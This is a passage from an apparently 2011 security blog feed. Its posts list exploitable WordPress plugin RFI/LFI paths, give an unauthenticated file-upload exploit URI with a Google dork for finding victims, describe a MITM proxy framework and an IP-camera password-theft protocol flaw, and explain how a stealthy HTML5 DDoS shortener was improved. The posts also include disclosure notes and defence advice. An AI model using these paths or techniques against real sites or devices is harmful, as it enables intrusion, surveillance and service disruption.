&lt;li&gt;relocate-upload = relocate-upload.php?ru_folder=asdf&amp;amp;abspath=RFI&lt;/li&gt;
&lt;li&gt;disclosure-policy-plugin =
/functions/action.php?delete=asdf&amp;amp;blogUrl=asdf&amp;amp;abspath=RFI&lt;/li&gt;
&lt;li&gt;wordpress-console = /common.php POST=&amp;quot;root=RFI&amp;quot;&lt;/li&gt;
&lt;li&gt;livesig = /livesig-ajax-backend.php POST=&amp;quot;wp-root=RFI&amp;quot;&lt;/li&gt;
&lt;li&gt;annonces = /includes/lib/photo/uploadPhoto.php?abspath=RFI&lt;/li&gt;
&lt;li&gt;theme-tuner = /ajax/savetag.php POST=&amp;quot;tt-abspath=RFI&amp;quot;&lt;/li&gt;
&lt;li&gt;evarisk =
/include/lib/actionsCorrectives/activite/uploadPhotoApres.php?abspath=RFI&lt;/li&gt;
&lt;li&gt;light-post = /wp-light-post.php?abspath=RFI&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Local File Include - unauthenticated&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;----------------------------------------------------------&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;news-and-events = &lt;a class="reference external" href="http://host/wordpress/?ktf=ne_LFIPATH%00"&gt;http://host/wordpress/?ktf=ne_LFIPATH%00&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As an experiment, I also modified a nice static source analyzer called
&lt;a class="reference external" href="http://sourceforge.net/projects/rips-scanner/files/"&gt;RIPS&lt;/a&gt; to take command line arguments (&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/ripscli.tar.bz2"&gt;grab here&lt;/a&gt;, if interested) and
print out some basic information on probable vulnerabilities, and then
ran it over the plugin repo. Unfortunately, the noise was still pretty
high (partly due to its lack of OO support), so I didn't find all too
much beyond the greps. However, it did turn up a few RFIs:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;thecartpress =
/checkout/CheckoutEditor.php?tcp_save_fields=true&amp;amp;tcp_class_name=asdf&amp;amp;tcp_class_path=RFI&lt;/li&gt;
&lt;li&gt;allwebmenus-wordpress-menu-plugin = actions.php POST=&amp;quot;abspath=RFI&amp;quot;&lt;/li&gt;
&lt;li&gt;wpeasystats = export.php?homep=RFI&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Finally, I searched for Uploadify usage and outdated timthumb.php
libraries. This turned up another 24 vulnerable plugins:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;user-avatar - /user-avatar-pic.php -&amp;gt; Only vulnerable if
register_globals is enabled&lt;/li&gt;
&lt;li&gt;onswipe - /framework/thumb/thumb.php&lt;/li&gt;
&lt;li&gt;islidex - /js/timthumb.php&lt;/li&gt;
&lt;li&gt;seo-image-galleries - /timthumb.php&lt;/li&gt;
&lt;li&gt;verve-meta-boxes - /tools/timthumb.php&lt;/li&gt;
&lt;li&gt;dd-simple-photo-gallery - /include/resize.php&lt;/li&gt;
&lt;li&gt;wp-marketplace - /libs/timthumb.php&lt;/li&gt;
&lt;li&gt;a-gallery - /timthumb.php&lt;/li&gt;
&lt;li&gt;auto-attachments - /thumb.php&lt;/li&gt;
&lt;li&gt;cac-featured-content - /timthumb.php&lt;/li&gt;
&lt;li&gt;category-grid-view-gallery - /includes/timthumb.php&lt;/li&gt;
&lt;li&gt;category-list-portfolio-page - /scripts/timthumb.php&lt;/li&gt;
&lt;li&gt;cms-pack - /timthumb.php&lt;/li&gt;
&lt;li&gt;dp-thumbnail - /timthumb/timthumb.php&lt;/li&gt;
&lt;li&gt;extend-wordpress - /helpers/timthumb/image.php&lt;/li&gt;
&lt;li&gt;kino-gallery - /timthumb.php&lt;/li&gt;
&lt;li&gt;lisl-last-image-slider - /timthumb.php&lt;/li&gt;
&lt;li&gt;mediarss-external-gallery - /timthumb.php&lt;/li&gt;
&lt;li&gt;really-easy-slider - /inc/thumb.php&lt;/li&gt;
&lt;li&gt;rekt-slideshow - /picsize.php&lt;/li&gt;
&lt;li&gt;rent-a-car - /libs/timthumb.php&lt;/li&gt;
&lt;li&gt;vk-gallery - /lib/timthumb.php&lt;/li&gt;
&lt;li&gt;gpress =
/gpress-admin/fieldtypes/styles_editor/scripts/uploadify.php?fileext=php
- exact same as 1 Flash Plugin vuln&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Obviously, it's not very hard to find a decent number of 0days just by
grepping around, which is mildly disconcerting. Honestly, I had so many
hits for these searches that I probably missed a good deal of them. But
what else, besides vulnerability discovery, can we do with all this
data?&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fingerprint"&gt;
&lt;h2&gt;Fingerprint&lt;/h2&gt;
&lt;p&gt;As an attacker, it's always nice to be able to figure out exactly what
code is running on a given server. Of course, this isn't usually
possible, as it requires a large body of information that just isn't
there. However, it becomes much, much easier when you have access to the
wealth of information contained in an SVN repo.&lt;/p&gt;
&lt;p&gt;I feel that I should mention that &lt;a class="reference external" href="https://twitter.com/#!/ethicalhack3r"&gt;ethicalhack3r's&lt;/a&gt; awesome tool
&lt;a class="reference external" href="http://code.google.com/p/wpscan/"&gt;WPScan&lt;/a&gt; does some of this, but last I checked will only detect if the
top 2000 plugins are installed, and, as far as I know, won't give you a
version. This is not to fault his work, though, at all; as I said, doing
fine grained fingerprinting on every plugin would normally be difficult
to impossible in most circumstances, and his tool does a ton of stuff
that wpfinger doesn't.&lt;/p&gt;
&lt;p&gt;So what does the repo give us that we were missing before? Well, we of
course have a list of all the plugins, and it is then trivial to grab
all of their download stats from wordpress.org to sort them in order of
popularity. In addition, we have not only the current version of the
plugin in the trunks, but we also (if SVN is being used properly) have
tags for each of the major version changes. Simply by comparing these
and finding changed files that we can check for remotely
(added/removed/modified content files or added/removed php scripts), we
can build a very effective fingerprint for each version of the plugin.
Then, all we have to do is run a small number of checks once we find
that a plugin is installed to obtain, at the very least, the major
version of the plugin.&lt;/p&gt;
&lt;p&gt;My current implementation is not pretty, but it seems to work quite well
on the servers I tested with. My signatures are simply binary search
trees encoded using Python tuples (don't judge me, it was quick to do it
that way), which I regenerate whenever I update the SVN. &amp;nbsp;The initial
fingerprinting takes quite awhile, as it stupidly MD5s all of the
relevant files in the repos. This was before I knew that
&lt;a class="reference external" href="http://docs.python.org/library/filecmp.html"&gt;filecmp/dircmp&lt;/a&gt; existed, so that's probably going to be rewritten soon
enough.&lt;/p&gt;
&lt;p&gt;Once the signatures are created, the scans are quite fast, and very
effective. It normally only takes one to two requests to detect plugin
presence, and only takes two or three more in most cases to detect the
version. It also tries to deal with things like error pages that return
200 by using difflib to compare the error page to the returned page,
although there's probably still some issues with that.&lt;/p&gt;
&lt;p&gt;As I mentioned earlier, you can check the &lt;a class="reference external" href="http://code.google.com/p/wpfinger/source/checkout"&gt;latest versions&lt;/a&gt; over on
Google Code from now on. Here's a screenshot of a scan against one of my
test servers:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/09/wpfinger1.png"&gt;&lt;img alt="wpfinger in action" src="https://spareclockcycles.org/wp-content/uploads/2011/09/wpfinger1.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Now that I've outlined more than enough ways to aid exploitation, let's
talk briefly about what can be done to help prevent some of these
attacks.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="defend"&gt;
&lt;h2&gt;Defend&lt;/h2&gt;
&lt;p&gt;For the Wordpress developers, the best defense would probably be to scan
any commits for known vulnerabilities, and either warn or (preferably)
block the developers from adding exploitable code to the repository.
This can be done quite easily using pre-commit hooks for SVN, which
allow for custom verification of commits to a repository. I'm planning
on releasing an example script when I get time that will detect commits
introducing the vulnerabilities I scanned for, but the more interesting
problem is how to gather a larger, better collection of signatures. I've
got a couple vague ideas for how to go about doing this, but would love
suggestions on the subject.&lt;/p&gt;
&lt;p&gt;As for what site admins can do, it's pretty clear: don't install plugins
or themes unless you *absolutely* need to or you are willing to and
have the expertise to audit what you're installing. Just because you
have the latest version does not necessarily make you safe, and if you
forget to update, it's quite easy for an attacker to detect and exploit.
In addition to limiting your number of installed plugins, it might be
possible to parse the signatures I provide and use a WAF to return
tainted results when those URLs are requested too closely together.
Haven't personally done it, but I'm sure it wouldn't be too
extraordinarily difficult.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The methods presented here are not unique to Wordpress; I'm fairly
confident in saying that it could easily be applied to any open source
CMS. I largely chose Wordpress because I was already working with it
when I stumbled into this, and they had a really nice repository to pull
from. Please feel free to try it out other places, and let me know how
it goes.&lt;/p&gt;
&lt;p&gt;P.S.: I'd like to thank &lt;a class="reference external" href="http://dustybit.com"&gt;duststorm&lt;/a&gt; for lending me a server to seed the
repos with. Much appreciated.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="lfi"></category><category term="rfi"></category><category term="scanning"></category><category term="sqli"></category><category term="subversion"></category><category term="svn"></category><category term="vulnerabilities"></category><category term="wordpress"></category></entry><entry><title>1 Flash Gallery: Arbitrary File Upload</title><link href="https://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload.html" rel="alternate"></link><updated>2011-09-06T19:40:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-09-06:2011/09/06/flash-gallery-arbitrary-file-upload.html</id><summary type="html">&lt;p&gt;This is a short post documenting the vulnerability I&amp;nbsp;inadvertently&amp;nbsp;found
yesterday in the &lt;a class="reference external" href="http://wordpress.org/extend/plugins/1-flash-gallery/"&gt;1 Flash Gallery plugin&lt;/a&gt;, which has since been
patched. This plugin has been downloaded an estimated 460,000 times, and
as of yesterday was ranked by Wordpress as the 17th most popular plugin
(although I'm not entirely sure how this judgement is made). A patch has
been released, so anyone who has this plugin installed should update
immediately. I'll probably do a follow-up in the near future on
Wordpress plugins in general, but for now, just the facts.&lt;/p&gt;
&lt;div class="section" id="vulnerability"&gt;
&lt;h2&gt;Vulnerability&lt;/h2&gt;
&lt;p&gt;The 1 Flash Gallery Wordpress plugin is vulnerable to an arbitrary file
upload vulnerability. This vulnerability is present from version 1.30
until version 1.5.7.&lt;/p&gt;
&lt;p&gt;It is possible to plant a remote shell and thereby execute arbitrary
code on the remote host by simply submitting a PHP file via POST request
to the following URI on a vulnerable installation:&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&amp;amp;fileext=php&lt;/span&gt;&lt;/tt&gt;&lt;/p&gt;
&lt;p&gt;This works because the upload.php script a.) performs no authentication
checks, b.) trusts a user-supplied request variable to provide allowed
filetypes, and c.) does not actually validate that the file is a
well-formed image file. I have only tested the vulnerability on an
installation that does not perform watermarking, the default setting; it
may or may not work on installations that do otherwise.&lt;/p&gt;
&lt;p&gt;I have created a proof-of-concept Metasploit module demonstrating the
vulnerability, which interested persons can download here:
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/fgallery_file_upload.rb"&gt;https://spareclockcycles.org/downloads/code/fgallery_file_upload.rb&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Hosts can be found with the following Google
search:&amp;nbsp;inurl:&amp;quot;wp-content/plugins/1-flash-gallery&amp;quot;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="disclosure"&gt;
&lt;h2&gt;Disclosure&lt;/h2&gt;
&lt;p&gt;I reported the vulnerability to both Wordpress and the plugin developers
yesterday, Sep 5 2011. Both responded quickly to the issue, and took
appropriate measures. Wordpress temporarily took down the plugin until
the patch was released, which the developers did later in the day. I 'd
like to thank Wordpress for their fast and professional response.&lt;/p&gt;
&lt;p&gt;I am now releasing details of the vulnerability publicly to ensure that
users are aware of the issue, and encourage them to update their plugins
accordingly. The 1 Flash Gallery developers did not stress the severe
implications of this vulnerability in &lt;a class="reference external" href="http://wordpress.org/extend/plugins/1-flash-gallery/changelog/"&gt;their changelog&lt;/a&gt; (or mention
that it was a security issue at all), so this post is partly to ensure
that the implications are made clear. Personally, I would uninstall the
plugin, given its &lt;a class="reference external" href="http://secunia.com/advisories/43640"&gt;history of serious security issues&lt;/a&gt;&amp;nbsp;and the
developers' lack of candor about those reported to them.&lt;/p&gt;
&lt;p&gt;As always, any comments are welcome.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="arbitrary file upload"></category><category term="metasploit"></category><category term="vulnerability"></category><category term="websec"></category></entry><entry><title>Sergio Proxy v0.2 Released</title><link href="https://spareclockcycles.org/2011/07/10/sergio-proxy-v0-2-released.html" rel="alternate"></link><updated>2011-07-10T18:06:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-07-10:2011/07/10/sergio-proxy-v0-2-released.html</id><summary type="html">&lt;div class="section" id="updates-in-this-release"&gt;
&lt;h2&gt;Updates in this Release&lt;/h2&gt;
&lt;p&gt;So after a ridiculously long period of procrastination, I finally got
around to updating Sergio Proxy to make it remotely usable. I was never
very happy with how the initial code turned out, but given that it was
hacked out in a couple days just to test some ideas, I suppose that
shouldn't be surprising. My original hope for it was to provide a very
easy to extend plugin interface that allowed Python programmers to
easily modify requests and responses during a MITM attack on HTTP.
&amp;nbsp;While you could extend it without too much trouble, it was far from
perfect, and passing options to the thing was an atrocious mess. Worse,
my hooks into Twisted weren't the most stable or fast, rendering it not
very useful.&lt;/p&gt;
&lt;p&gt;I believe I've solved some of these issues in this release, although you
can certainly judge for yourself. I've made three major changes: first,
rather than using my own transparent proxy classes for interacting with
Twisted, I've instead started using &lt;a class="reference external" href="http://www.thoughtcrime.org/software/sslstrip/"&gt;Moxie Marlinspike's sslstrip&lt;/a&gt; to
provide the proxy functionality. Although I didn't know it when I first
started Sergio Proxy, sslstrip uses almost exactly the same method for
creating the transparent proxy: extending the Twisted framework's HTTP
proxy classes. Rather than duplicate effort to create something that
would still be miles behind, I instead decided to focus on providing a
convenient plugin interface that could hook sslstrip at various points
during operation. This brings me to the second change: a new plugin
interface that should make it ridiculously simple to extend Sergio
Proxy. I've currently implemented three modules (SMBAuth, ArpSpoof, and
Upsidedownternet), but really there are tons of other things that could
be done. Finally, I completely revamped the logging and options code,
which were virtually non-existent in my first release. Combined, these
should make Sergio Proxy a nice framework for making use of HTTP MITM
attacks. You can grab the new code
here:&amp;nbsp;&lt;a class="reference external" href="https://code.google.com/p/sergio-proxy/downloads/list"&gt;https://code.google.com/p/sergio-proxy/downloads/list&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&amp;nbsp;Edit:&lt;/strong&gt;&amp;nbsp;I've also added a simple BrowserPwn plugin now, grab the
current trunk to get
it:&amp;nbsp;&lt;a class="reference external" href="https://code.google.com/p/sergio-proxy/source/checkout"&gt;https://code.google.com/p/sergio-proxy/source/checkout&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="using-and-abusing-sergio-proxy"&gt;
&lt;h2&gt;Using and Abusing Sergio Proxy&lt;/h2&gt;
&lt;p&gt;So enough about the changes: how would one go about using it? Well, if
all you want to do is evoke an SMB authentication attempt or launch the
Upsidedownternet, just run sergio-proxy.py -h and choose your desired
options. ArpSpoof will set up the MITM if you so desire (requires
ettercap or arpspoof), and sslstrip will record what it normally does.
If you want to do something else, though, you'll need to create a new
plugin. Don't worry, it's quite simple!&lt;/p&gt;
&lt;p&gt;First, you need to do a few simple things. The provided plugins provide
good examples, but I will step through the required steps just in case.
All plugins inherit from the Plugin class in plugins/plugin.py, and
Sergio Proxy needs to know the subclass relationship, so you must do a
&amp;quot;from plugins.plugin import Plugin&amp;quot; in every plugin file. No exceptions.
Then, you need to define some class attributes to tell Sergio Proxy
about your plugin. These are as follows: name (human friendly name),
optname (option name to enable plugin), has_opts (needs to add opts to
argparse object), and implements (a list of hooks it implements). If you
require arguments, you need to implement the add_options function. It
takes an &lt;a class="reference external" href="http://docs.python.org/dev/library/argparse.html#argparse.ArgumentParser"&gt;argparse Parser object&lt;/a&gt;&amp;nbsp;as its only argument, where you can
then do with it as you please. Be warned, though: if your arguments
conflict with others, you may have issues.&lt;/p&gt;
&lt;p&gt;Now, you are ready to implement the actual functionality of your plugin.
There are 5 functions that really matter, and you can see them in the
base Plugin class: initialize, handleHeader, connectionMade,
handleResponse, and finish. initialize is passed the namespace that
argparse parsed, and is called whenever your plugin has been enabled by
a command line switch and is going to be run. You should do any setup
you require here rather than __init__, as you won't have options in
__init__ and it entirely possible your module won't be run after
that point. finish, likewise, is called on shutdown.&lt;/p&gt;
&lt;p&gt;There are three points where Sergio Proxy hooks sslstrip by default
right now: on connecting to the server prior to sending the victim's
request, on receiving any header from the server, and prior to sending a
response to the client. These functions are the other three functions I
mentioned. It is quite simple to add more if necessary, but that's
outside the scope of this post. Whenever sslstrip hits any of these
three points during execution, Sergio Proxy checks to see if any plugin
wants to hook that function and, if so, calls the function with
arguments that were provided to the function call in sslstrip.
Generally, &amp;nbsp;if you have changes you want to send back to sslstrip, you
should modify the request object, and not return anything. However, in
the handleResponse hook this is not possible (as the local var data is
used rather than an object attribute), and you must return a dictionary
containing the modified arguments. This is currently the only case where
this is necessary, but it's important to note.&lt;/p&gt;
&lt;p&gt;Now, all you need to do is override these functions to do what you want.
If you're wondering what information you have access to through the
request object, it may be useful to either a.) hook the function you
want and print out information about it at that time or b.) look through
sslstrip and the Twisted proxy documentation. Also, the plugins I
provided show some of the basic things you might want to do.&lt;/p&gt;
&lt;p&gt;Hopefully you all find the new changes useful. If you end up writing a
plugin, please feel free to submit it! If it was useful to you, it is
likely it will be useful to others as well. Happy hacking&lt;/p&gt;
&lt;/div&gt;
</summary><category term="http"></category><category term="mitm"></category><category term="sergio proxy"></category><category term="twisted"></category></entry><entry><title>Exploiting an IP Camera Control Protocol</title><link href="https://spareclockcycles.org/2011/05/23/exploiting-an-ip-camera-control-protocol.html" rel="alternate"></link><updated>2011-05-23T16:43:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-05-23:2011/05/23/exploiting-an-ip-camera-control-protocol.html</id><summary type="html">&lt;p&gt;When I first started on this post, I intended to write about some fun
things one can do with a $30 Rosewill IP camera (&lt;a class="reference external" href="http://www.rosewill.com/products/1728/productDetail.htm"&gt;RXS-3211&lt;/a&gt;). While I
still intend to do this in the near future, I decided instead to
document an interesting password disclosure vulnerability I found that
appears to affect at least 150 different IP-based surveillance cameras.
This vulnerability allows a remote, unauthenticated attacker to read
and/or change the administrator password on affected devices by sending
a single UDP packet. This gives an attacker full control over the
device, including access to the video streams.&amp;nbsp;Relatedly, a passive
attacker on the local network can retrieve the current password without
a MITM attack if the device is currently being administrated.&lt;/p&gt;
&lt;p&gt;Before I start, though, I would like to clarify: I have only tested this
attack against the RXS-3211, as it is the only one I own / can afford.
That said, I believe that it is a problem with the management protocol
rather than just the device itself. It is possible that the problem is
limited just to the RXS, but I have tested the Windows admin interfaces
of other cameras with similar results. Doing this actually helped me
improve the attack, so it seems likely that it will work elsewhere.
Regardless, I would definitely love to hear from anyone who has a
possibly affected device and get feedback / pcap dumps.&lt;/p&gt;
&lt;p&gt;The list of affected devices, pulled using strings from the Rosewill
admin executable, can be &lt;a class="reference external" href="https://spareclockcycles.org/downloads/ipcam_pass_disclosure_devices.txt"&gt;grabbed here&lt;/a&gt;. It includes devices from
Edimax, Hawking, Rosewill, Intellinet, Nilox, Zonet, 2Direct, among
others. Many of these appear to be rebrands, but I can't really know
without devices to look at. This list does not include the large number
of &amp;quot;UnKnown&amp;quot; entries that could also be affected.&lt;/p&gt;
&lt;div class="section" id="why-i-can-t-have-nice-things-i-break-them"&gt;
&lt;h2&gt;Why I Can't Have Nice Things (I Break Them)&lt;/h2&gt;
&lt;p&gt;I bought the previously mentioned camera this week as a cheap way to
monitor my apartment. Not content simply to set the thing up and leave
it be, I first wanted to kick the metaphorical tires a bit. It turned
out to be running an embedded version of Linux, and had TCP ports 80
(HTTP), 554 (RTSP), and 4321-2 (proprietary viewing protocol) open. At
this point, I became curious to see if I could run my own code on the
thing (which could make it quite useful), so I started poking around for
vulnerabilities that might allow for that.&lt;/p&gt;
&lt;p&gt;The web interface quite probably provides a number of ways to get a
shell, but I decided first to look at how the administrative control
application that was provided with it worked. Interestingly, as soon as
I opened the application, it had detected my camera. I fired up
Wireshark, and it turned out that it was communicating to the device via
UDP broadcast messages to port 13364.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="how-not-to-design-a-protocol"&gt;
&lt;h2&gt;How Not To Design a Protocol&lt;/h2&gt;
&lt;p&gt;After some glancing over the traffic logs, it was pretty clear that this
control protocol was terrible. I could go on for awhile about the design
problems with it, but it would be rather off topic.&lt;/p&gt;
&lt;p&gt;The real problem I uncovered was how the protocol handles
authentication. It's a simple protocol, and consists of request packets
(sent by the admin software) and reply packets (sent by the device).
Depending on the request, the response is either sent broadcast or
unicast. The packets all follow the same format before diverging:
|  6 bytes -&amp;gt; Concerned device (FF:FF:FF:FF:FF for all, device MAC for
specific)
|  1 byte -&amp;gt; Request or response (0 or 1 respectively)
|  3 bytes -&amp;gt; Req/resp type (some unique ID that the software
understands)
|  Rest -&amp;gt; Req/resp specific payload (optional)&lt;/p&gt;
&lt;p&gt;Each type of request/response seems to have a set size, and if you send
one of an unexpected size, the packet is ignored. From the large number
of null bytes in the packets, it seems that there are extra fields that
can be provided that I haven't explored yet. The one we care about,
however, is obvious: the password field. Yes, the password is sent, (and
in some cases, broadcast) &lt;strong&gt;in clear text&lt;/strong&gt; following an unauthenticated
request from anywhere. The admin interface reads this password,
authenticates users &lt;strong&gt;client side&lt;/strong&gt;, and, if it passes, will allow the
user to send configuration requests. In addition to just being able to
steal the device password remotely, we can also change the password
&lt;strong&gt;and&lt;/strong&gt; do it with a spoofed UDP packet, hiding the source of the
attack.&lt;/p&gt;
&lt;p&gt;I ran into a bit of a problem with the Rosewill-provided management
interface, but it wasn't too difficult to overcome. It only supported
broadcast queries and settings, which made it impossible to read the
password remotely (i.e, outside the local network), and no response
would be given if one set the password, making scanning much more
difficult. However, I assumed they must have a way to get a unicast
response instead, as some other camera manuals advise users to forward
UDP port 13364 on their routers. Rather than trying the codes manually,
I downloaded a few different management interfaces until I found one
that supported remote cameras. I set it up to talk to mine, and voila,
unicast commands were mine.&lt;/p&gt;
&lt;p&gt;With these, it's trivial to read or change the password of the device.
This can be exploited remotely and, as mentioned, with a spoofed source
address for the set command (yay connectionless protocols). Having the
password then gives full administrative control over the device,
allowing an attacker to basically do anything, from simply watching the
camera feeds to exploiting the device further. If you have one of these
devices yourself, you can test with my proof-of-concept code:
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/rxs-3211-changepw.py"&gt;rxs-3211-changepw.py&lt;/a&gt; and &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/rxs-3211-retrievepw.py"&gt;rxs-3211-retrievepw.py&lt;/a&gt; (both require
&lt;a class="reference external" href="http://www.secdev.org/projects/scapy/"&gt;Scapy&lt;/a&gt;) . I also went ahead and made a Metasploit module that will
scan a network for vulnerable hosts: &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/rxs_3211_retrievepw.rb"&gt;rxs-32111-retrievepw.rb&lt;/a&gt; . If
it's in the list but is not the RXS-3211, then the packets that need to
be sent may be significantly different (probably &amp;nbsp;just the changepw
packets), but the underlying protocol problem should still be present.
Wireshark/tcpdump are your friends; use them, and you should be able to
figure it out.&lt;/p&gt;
&lt;p&gt;EDIT: The Metasploit people were kind enough to improve my module and
throw it into their SVN, so you can grab it there. Thanks, guys!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="disclosure"&gt;
&lt;h2&gt;Disclosure&lt;/h2&gt;
&lt;p&gt;The fact that this vulnerability appears to be a design issue that
requires both firmware and client software patches, combined with the
large number of affected devices, makes it very difficult (if not
impossible) to patch in any reasonable timeframe. This, together with
the confusion over who actually maintains this software, led me to
decide to release this before patching so users could protect themselves
by blocking access to port 13364. I did contact Rosewill prior to this
post, but have not yet received a reply.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-rest"&gt;
&lt;h2&gt;The Rest&lt;/h2&gt;
&lt;p&gt;If you have one of these devices, block all external access to UDP port
13364, regardless of what your user manual instructs you to do. If
attackers might have local network access, there is not much you can do
but cut it off from the rest of the network. Other cameras might be
different, but mine did not have an option to disable UDP management.&lt;/p&gt;
&lt;p&gt;I know cracking some of these embedded devices is a lot like beating a
three year old at a foot race, but it was a good way to occupy a few
hours. Hopefully I'll be back in a short while with more fun things to
do with a cheap IP camera; until then, peace.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="ip camera"></category><category term="password disclosure"></category><category term="protocol analysis"></category><category term="vulnerabilities"></category></entry><entry><title>Weaponizing d0z.me: Improved HTML5 DDoS</title><link href="https://spareclockcycles.org/2011/03/27/weaponizing-d0z-me.html" rel="alternate"></link><updated>2011-03-27T22:57:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-03-27:2011/03/27/weaponizing-d0z-me.html</id><summary type="html">&lt;p&gt;Well, here were are, about three months since I &lt;a class="reference external" href="https://spareclockcycles.org/2010/12/19/d0z-me-the-evil-url-shortener/"&gt;initially released
d0z.me&lt;/a&gt;, and I've finally gotten away from school and life for a bit
this week and updated it. However, I think it was definitely worth the
wait. You can grab the code over at &lt;a class="reference external" href="http://code.google.com/p/d0z-me/"&gt;d0z.me's new Google Code
repository&lt;/a&gt;, and &lt;a class="reference external" href="http://d0z.me"&gt;see it in action here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Beyond making the backend code a little bit less of a disaster than it
was originally, I have also made the attack itself significantly more
effective. For the impatient among you, I will summarize the changes
here:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;More efficient web worker implementation for making the requests.&lt;/li&gt;
&lt;li&gt;Some cosmetic changes that make it less obvious that an attack is
occurring.&lt;/li&gt;
&lt;li&gt;Switched to POST requests by default, which allow us to hold server
threads longer and exhaust a target's bandwidth.&lt;/li&gt;
&lt;li&gt;Lots of updates to the backend code.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Before I go on though, I'd like to send another big THANK YOU to
Lavakumar Kuppan over at &lt;a class="reference external" href="http://andlabs.org"&gt;andlabs.org&lt;/a&gt; for his research, feedback, and
suggestions. His research was what originally inspired d0z.me, and he
has helped give me a few very useful suggestions on how to improve it.
Go follow &lt;a class="reference external" href="http://blog.andlabs.org"&gt;the andlabs blog&lt;/a&gt;. Also, thank you to everyone else who sent
in bug reports, suggestions, etc since I released it. You rock.&lt;/p&gt;
&lt;div class="section" id="web-worker-changes"&gt;
&lt;h2&gt;Web Worker Changes&lt;/h2&gt;
&lt;p&gt;My original implementation of the HTML5 DDoS attack did its job well,
but was not exactly polished. I had some ideas for speed improvements
even at the time, but hadn't spent much time optimizing. As it was, it
opened four webworkers, and only made one request at a time. This
produced good results, but was very processor intensive for Firefox
users, and wasted valuable time waiting for a response from the server
at times. I also was unable to recreate the results from Lava's original
presentation (although this later turned out to be a flaw in my testing
procedure).&lt;/p&gt;
&lt;p&gt;After I released d0z.me, Lava contacted me and suggested instead that I
run one web worker and launch many simultaneous requests. Obviously,
running multiple requests at a time is much more efficient. With some
slight modifications to the pseudocode he provided (to ensure a full
request queue is maintained), I was able to achieve slightly better
speeds, using only two web workers instead of four.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="cosmetic-improvements"&gt;
&lt;h2&gt;Cosmetic Improvements&lt;/h2&gt;
&lt;p&gt;Originally, d0z.me also implemented an attack almost identical to that
of JSLOIC, meaning that an image constantly reloaded in the background.
While it added a few extra requests per second, it was rather
insignificant compared to its HTML5 counterpart, could only perform GET
requests, and had the serious downside of displaying a progress bar in
some browsers. Because of this, it has now been removed. In addition,
d0z.me now attempts to pull the embedded site's favicon as it's own, so
as to appear more legitimate. With these two changes, the URL becomes
the only way to tell the embedded site and d0z.me apart in most
browsers.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="using-post-requests-for-attack-amplification"&gt;
&lt;h2&gt;Using POST Requests for Attack Amplification&lt;/h2&gt;
&lt;div class="section" id="advantages-to-post-attack"&gt;
&lt;h3&gt;Advantages to POST Attack&lt;/h3&gt;
&lt;p&gt;One limitation of the original d0z.me implementation was that it could
do little in regards to consuming bandwidth. In addition, while it was
able to overwhelm servers with the sheer number of requests, server
threads were not held for a very sizable amount of time. This meant that
it required a decent number of users to significantly affect performance
(either by consuming all available threads, crashing the database, etc).
Bandwidth and thread exhaustion are both commonly used DDoS techniques,
so why can't we do the same with HTML5 DDoS? Well, turns out, we can!&lt;/p&gt;
&lt;p&gt;While the original version of d0z.me used GET requests, we can also make
POST requests via CORS. Of course, we can simply issue the same number
of requests/second as we can with GET, meaning that in most situations,
even without a payload, the effect will be similar. However, there are a
number of advantages that POST gives us that GET does not that should be
obvious.&lt;/p&gt;
&lt;p&gt;Unlike the previous version, however, attackers don't need to find large
files on the host to overwhelm the hosts' bandwidth. Given that the
default maximum request size is 2GB on Apache, we can send quite sizable
requests safely. Most configurations do, in fact, override this default,
but we can still send decently large requests regardless. To ensure that
it works on most hosts, d0z.me's attack is set to use a 1MB request
body. In practice, this is more than sufficient to generate excessive
amounts of traffic.&lt;/p&gt;
&lt;p&gt;Beyond the bandwidth advantages, we also tie up the server threads for a
much longer amount of time, as the host must receive the request before
responding. While this doesn't use a &amp;quot;slow POST&amp;quot; style attack like
&lt;a class="reference external" href="http://ha.ckers.org/slowloris/"&gt;Slowloris&lt;/a&gt;, it has a similar effect: tying up processing threads that
